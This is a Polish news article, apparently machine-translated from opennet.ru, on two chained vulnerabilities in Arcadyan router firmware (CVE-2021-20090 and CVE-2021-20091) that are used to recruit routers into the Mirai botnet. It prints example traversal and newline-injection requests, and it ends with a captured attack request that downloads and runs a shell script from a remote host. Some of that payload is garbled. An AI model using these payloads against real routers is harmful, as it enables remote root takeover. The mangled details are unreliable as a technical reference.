W sieci zarejestrowano zmasowany atak na domowe routery, których firmware wykorzystuje implementację serwera HTTP firmy Arcadyan. Aby przejąć kontrolę nad urządzeniami, wykorzystywana jest kombinacja dwóch podatności, która umożliwia zdalne wykonanie dowolnego kodu z uprawnieniami roota. Problem dotyczy dość szerokiej gamy routerów ADSL firm Arcadyan, ASUS i Buffalo, a także urządzeń dostarczanych pod markami Beeline (problem potwierdzono w Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone i inni operatorzy telekomunikacyjni. Należy zauważyć, że problem występuje w oprogramowaniu Arcadyan od ponad 10 lat i w tym czasie udało się migrować do co najmniej 20 modeli urządzeń od 17 różnych producentów.
Pierwsza luka, CVE-2021-20090, umożliwia dostęp do dowolnego skryptu interfejsu internetowego bez uwierzytelniania. Istota luki polega na tym, że w interfejsie internetowym niektóre katalogi, przez które przesyłane są obrazy, pliki CSS i skrypty JavaScript, są dostępne bez uwierzytelniania. W tym przypadku katalogi, do których dozwolony jest dostęp bez uwierzytelniania, są sprawdzane przy użyciu maski początkowej. Określanie znaków „../” w ścieżkach prowadzących do katalogu nadrzędnego jest blokowane przez oprogramowanie sprzętowe, ale użycie kombinacji „..%2f” jest pomijane. Dzięki temu możliwe jest otwieranie chronionych stron podczas wysyłania żądań typu „http://192.168.1.1/images/..%2findex.htm”.
Druga luka, CVE-2021-20091, umożliwia uwierzytelnionemu użytkownikowi dokonanie zmian w ustawieniach systemowych urządzenia poprzez przesłanie specjalnie sformatowanych parametrów do skryptu Apply_abstract.cgi, który nie sprawdza obecności znaku nowej linii w parametrach . Przykładowo, wykonując operację ping, atakujący może podać wartość „192.168.1.2%0AARC_SYS_TelnetdEnable=1” w polu sprawdzanego adresu IP oraz skrypt podczas tworzenia pliku ustawień /tmp/etc/config/ .glbcfg, zapisze w nim wiersz „AARC_SYS_TelnetdEnable=1” „, który aktywuje serwer telnetd, który zapewnia nieograniczony dostęp do powłoki poleceń z uprawnieniami roota. Podobnie, ustawiając parametr AARC_SYS, możesz wykonać dowolny kod w systemie. Pierwsza luka umożliwia uruchomienie problematycznego skryptu bez uwierzytelnienia poprzez dostęp do niego jako „/images/..%2fapply_abstract.cgi”.
Aby wykorzystać luki, osoba atakująca musi mieć możliwość wysłania żądania do portu sieciowego, na którym działa interfejs sieciowy. Sądząc po dynamice rozprzestrzeniania się ataku, wielu operatorów pozostawia na swoich urządzeniach dostęp z sieci zewnętrznej, aby ułatwić diagnostykę problemów przez serwis wsparcia. Jeżeli dostęp do interfejsu ograniczony jest jedynie do sieci wewnętrznej, atak można przeprowadzić z sieci zewnętrznej wykorzystując technikę „ponownego wiązania DNS”. Luki są już aktywnie wykorzystywane do łączenia routerów z botnetem Mirai: POST /images/..%2fapply_abstract.cgi Połączenie HTTP/1.1: zamknij User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Źródło: opennet.ru